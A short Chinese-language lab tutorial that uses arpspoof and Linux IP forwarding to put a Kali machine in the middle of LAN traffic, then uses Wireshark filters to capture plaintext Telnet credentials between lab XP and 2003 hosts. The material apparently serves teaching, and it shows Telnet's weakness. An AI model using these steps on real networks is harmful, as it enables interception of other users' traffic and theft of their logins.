0x00

Wireshark（前称Ethereal）是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包，并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口，直接与网卡进行数据报文交换。

我们可以利用arpspoof拦截转发同一网段下其他用户流量，再使用Wireshark来分析查看流量

配置环境:

攻击端：kali 

靶机端：2003 xp

0x01

首先确保三台机在同一网段下

kali IP为192.168.1.3

XP IP为192.168.1.2

2003 IP为192.168.1.1

kali开启流量转发

cat /proc/sys/net/ipv4/ip_forward       查看浏览转发，如果是0就是没有开启，1是开启
0    可以看到没有开启
echo 1 > /proc/sys/net/ipv4/ip_forward      修改为1
这是时候我们的流量转发就能开启，别人的流量经过我这里也能转发出去

 接下来就是嗅探转发获取流量了

这里用到arpspoof来转发流量

arpspoof -i (自己网卡) -t  目标IP  网关

 打开Wireshark点开自己arpspoof配置的网卡

xp通过telnet连接2003

 回到Wireshark开始过滤

过滤规则

ip.addr==目标IP && tcp.port==23

 xp通过telnet连接2003时的明文账户密码直接暴露出来了